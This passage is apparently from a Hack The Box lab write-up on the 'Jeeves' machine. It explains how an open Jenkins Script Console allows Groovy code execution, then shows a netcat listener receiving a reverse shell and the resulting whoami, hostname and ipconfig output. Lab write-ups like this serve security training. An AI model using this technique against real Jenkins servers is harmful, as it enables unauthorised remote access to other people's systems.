Remote Code Execution
A Jetty instance on the target port 50000 has been identified for hosting a Jenkins instance at the /askjeeves/ endpoint, which is likely mapped to an incomplete web application hosted on the web server on the target port 80. A thorough examination of the Jenkins instance revealed a configuration within the global security context that is configured to authorize any user to perform any action, posing a notable risk of arbitrary code execution. This vulnerability is particularly concerning due to the exposed Script Console endpoint, which supports the execution of Groovy scripts.
The following sections will demonstrate a PoC(Proof of Concept), regarding the aforementioned vulnerability
Executing the payload
┌──(kali㉿kali)-[~/archive/htb/labs/jeeves]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.63] 49676
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
c:\Users\Administrator\.jenkins>whoami
whoami
jeeves\kohsuke
c:\Users\Administrator\.jenkins>hostname
hostname
Jeeves
c:\Users\Administrator\.jenkins>ipconfig
ipconfig
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . :
ipv4 address. . . . . . . . . . . : 10.10.10.63
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : 10.10.10.2
tunnel adapter isatap.{4079b648-26d5-4a56-9108-2a55ec5ce6ca}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . : Initial Foothold established to the target system as the kohsuke user via RCE